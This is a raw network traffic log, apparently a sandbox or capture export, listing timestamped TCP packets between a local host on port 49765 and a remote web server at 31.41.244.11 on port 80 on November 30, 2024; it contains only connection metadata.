Nov 30, 2024 04:06:10.684072971 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.684109926 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.684154987 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.685703039 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.685744047 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.685821056 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.685858011 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.687361956 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.687410116 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.687465906 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.687506914 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.689004898 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.689073086 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.689100027 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.689141035 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.690622091 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.690665960 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.690798998 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.690836906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.692220926 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.692261934 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.692334890 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.692374945 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.693773031 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.693818092 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.693892956 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.693934917 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.695346117 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.695391893 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.695447922 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.695489883 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.696893930 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.696935892 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.697005987 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.697047949 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.698412895 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.698457956 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.698510885 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.698560953 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.699940920 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.699980974 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.700052977 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.700092077 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.701455116 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.701491117 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.701569080 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.701607943 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.702959061 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.703006983 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.703066111 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.703108072 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.704483032 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.704535007 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.704600096 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.704638958 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.706007957 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.706052065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.706120014 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.706163883 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.707540035 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.707583904 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.707612991 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.707658052 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.709060907 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.709106922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.709156036 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.709197998 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.710563898 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.710619926 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.710675955 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.710719109 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.712083101 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.712121964 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.712203979 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.712245941 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.713610888 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.713656902 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.713722944 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.713766098 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.715159893 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.715207100 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.715281010 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.715322971 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.716711998 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.716759920 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.716783047 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.716825008 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.718292952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.718307972 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.718354940 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.719690084 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.719753027 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.719794035 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.719841003 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.721213102 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.721271992 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.721308947 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.721352100 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.722723961 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.722769976 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.722845078 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.722889900 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.724251986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.724298000 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.724354029 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.724405050 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.725800037 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.725847006 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.725898027 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.725941896 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.727299929 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.727351904 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.727406025 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.727448940 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.728816032 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.728868961 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.728925943 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.728971958 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.730354071 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.730401039 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.730473042 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.730516911 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.731848955 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.731893063 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.731955051 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.731997967 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.733365059 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.733411074 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.733486891 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.733532906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.734910965 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.734977961 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.735059977 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.735105038 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.736254930 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.736313105 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.736397982 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.736439943 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.737611055 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.737652063 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.737725019 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.737766981 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.738850117 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.738913059 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.738929987 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.738966942 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.740170956 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.740216970 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.740283966 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.740325928 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.741440058 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.741489887 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.741542101 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.741586924 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.742727995 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.742769957 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.803427935 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.803500891 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.803539991 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.803575993 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.804059982 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.804111004 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.804162979 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.804212093 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.805370092 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.805423021 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.805474043 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.805517912 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.806612015 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.806660891 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.863905907 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.864017010 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.864061117 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.864089012 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.864372969 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.864423037 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.864494085 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.864548922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.865283966 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.865330935 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.865391016 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.865433931 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.866226912 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.866276979 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.866312981 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.866357088 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.867158890 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.867208004 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.867264986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.867309093 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.868110895 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.868159056 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.868222952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.868264914 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.869030952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.869076014 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.869194984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.869237900 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.869975090 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.870021105 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.870069027 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.870111942 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.870912075 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.870956898 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.871017933 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.871059895 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.871887922 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.871933937 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.871994019 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.872037888 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.872787952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.872832060 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.872903109 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.872945070 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.873714924 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.873764038 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.873842001 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.873883963 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.874675035 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.874717951 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.874762058 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.874805927 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.875614882 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.875658989 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.875718117 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.875761986 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.876573086 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.876616001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.876678944 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.876729012 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.877495050 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.877541065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.877593994 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.877638102 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.878436089 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.878480911 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.878540039 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.878582001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.879371881 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.879419088 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.879456997 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.879498959 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.880321026 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.880363941 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.880415916 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.880458117 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.881257057 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.881294012 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.881356955 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.881400108 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.882184982 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.882229090 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.882287025 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.882328987 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.883120060 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.883163929 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.883215904 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.883259058 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.884057999 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.884102106 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.884165049 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.884207010 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.885006905 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.885051966 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.885071039 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.885113001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.885958910 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.886003971 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.886044025 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.886084080 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.886872053 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.886915922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.886971951 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.887013912 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.887840986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.887886047 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.887970924 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.888015032 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.888741970 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.888783932 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.888851881 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.888895988 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.889705896 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.889744043 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.889782906 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.889836073 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.890652895 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.890724897 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.890762091 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.890811920 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.891565084 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.891624928 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.891676903 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.891722918 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.892533064 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.892579079 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.892632961 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.892678022 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.893450022 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.893493891 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.893558025 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.893599033 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.894404888 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.894450903 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.894484997 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.894527912 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.895335913 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.895380020 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.895423889 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.895463943 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.896279097 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.896322012 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.896373034 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.896421909 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.897207975 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.897249937 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.897317886 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.897361994 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.898148060 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.898196936 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.898247957 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.898291111 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.899111032 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.899152040 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.899214983 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.899255991 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.900048018 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.900093079 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.900137901 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.900178909 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.900949955 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.900995016 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.901072979 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.901115894 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.901915073 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.901957989 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.902010918 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.902053118 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.902854919 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.902895927 CET	49765	80	192.168.2.4	31.41.244.11
